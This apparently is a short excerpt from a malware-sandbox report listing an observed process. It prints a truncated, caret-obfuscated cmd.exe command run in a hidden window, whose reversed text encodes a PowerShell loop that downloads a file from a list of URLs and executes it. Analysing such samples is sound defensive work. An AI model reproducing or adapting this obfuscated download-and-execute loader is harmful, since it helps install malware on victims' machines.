Technical information
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^Q^o=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^aerb;^j^a^G^$^ ^m^e^t^I^-^e^k^ovn^I^;)^j^aG^$^ ^,M^B^K^$(^e^l^i^F^d^a^oln^w^o^D^.^qv^i^$^{yr^t^{)cRr^$^ n^i ^MB^K^$(^h...
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^Q^o=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^aerb;^j^a^G^$^ ^m^e^t^I^-^e^k^ovn^I^;)^j^aG^$^ ^,M^B^K^$(^e^l^i^F^d^a^oln^w^o^D^.^qv^i^$^{yr^t^{)cRr^$^ n^i ^MB^K^$(^h...' (with hidden window)